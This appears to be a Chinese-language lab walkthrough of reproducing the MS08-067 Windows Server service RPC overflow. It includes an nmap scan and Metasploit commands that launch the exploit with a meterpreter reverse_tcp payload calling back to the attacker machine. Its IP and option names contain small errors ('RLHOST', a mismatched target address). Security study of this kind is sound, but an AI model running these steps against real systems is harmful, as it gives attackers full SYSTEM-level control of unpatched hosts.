一. 概述
Microsoft Windows是美國微軟(Microsoft)公司釋出的一系列作業系統。 Windows的Server服務在處理特制RPC請求時存在緩沖區溢出漏洞。遠端攻擊者可以通過發送惡意的RPC請求觸發這個溢出,導緻完全入侵使用者系統,以SYSTEM權限執行任意指令。 對于Windows 2000、XP和Server 2003,無需認證便可以利用這個漏洞;對于Windows Vista和Server 2008,可能需要進行認證。 目前這個漏洞正在被名為TrojanSpy:Win32/Gimmiv.A和TrojanSpy:Win32/Gimmiv.A.dll的木馬積極的利用。
詳情請查閱下方微軟官方文檔
概覽 |
---|
中文名:黯淡羽翼 |
微軟官方編号:MS08-067 |
CVE編号:CVE-2008-4250 |
類型:遠端代碼執行 |
官方評級:嚴重 |
影響系統:win2000,winxp,winserver03 |
二. 複現
這是一個有年代的漏洞了
攻擊機 | 靶機 |
---|---|
IP:192.168.5.111 | 192.168.5.113 |
OS:kali-linux | WindowsXPsp2 |
1.端口掃描
[email protected]-linux-wp:~# nmap -sS -Pn 192.168.5.114
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-06 22:20 CST
Nmap scan report for 192.168.5.114
Host is up (0.0017s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
MAC Address: 00:0C:29:9A:9C:2B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.95 seconds
2.調用載荷
3. 配置IP,payload
$ show options
$ set RHOSTS 192.168.5.114
$ set payload windows/meterpreter/reverse_ tcp
$ set RLHOST 192.168.5.111
$ exploit